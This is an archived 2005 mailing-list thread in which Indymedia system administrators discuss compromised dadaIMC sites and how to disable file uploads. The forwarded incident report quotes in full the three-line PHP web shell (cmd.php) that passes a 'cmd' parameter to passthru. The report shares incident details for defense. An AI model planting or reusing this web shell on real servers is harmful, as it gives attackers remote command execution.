[Imc-tech] [Fwd: dada hacked]
Arun Bhalla
bhalla at uiuc.edu
Thu Apr 28 10:51:48 CDT 2005
I think it might be okay as is. Zach has Apache setup to not serve
php or cgi requests from the usermedia/application directory. That's why
you get a Forbidden HTTP result if you try to click on that. Someone
else uploaded "icon.php" around March 8th and apparently gave up around
then.
But if (non-image) uploads have no utility for our users, let's shut it off.
Arun
"Daniel S. Lewart" writes:
> Mike, Zach, et al,
>
> If someone knows how to disable uploads, that would be a good thing.
>
> Cheers,
> Dan
>
> -------- Original Message --------
> Subject: dada hacked
> Date: Thu, 28 Apr 2005 12:04:04 -0300 (BRT)
> From: pietro <pietro at indymedia.org>
> Reply-To: dadaIMC Discussion <dadaIMC at lists.nothingness.org>
> To: dadaIMC at lists.nothingness.org
>
> hey folks,
>
> nj imc was one of the hacked dada sites. it was running .98. looking at
> the logs it seems that the attacker uploaded a .php file and used it to
> execute comands on the server.
>
> the file was called cmd.php and its contects is:
>
> <?php
> $cmd = $_GET['cmd'];
> passthru("$cmd", $return);
> ?>
>
>
> pietro.
>
>
> -------------
> To unsubscribe, send blank email
> to dadaIMC-off at lists.dadaimc.org
>
> _______________________________________________
> Imc-tech mailing list
> Imc-tech at lists.ucimc.org
> http://lists.chambana.net/cgi-bin/listinfo/imc-tech
>
More information about the Imc-tech
mailing list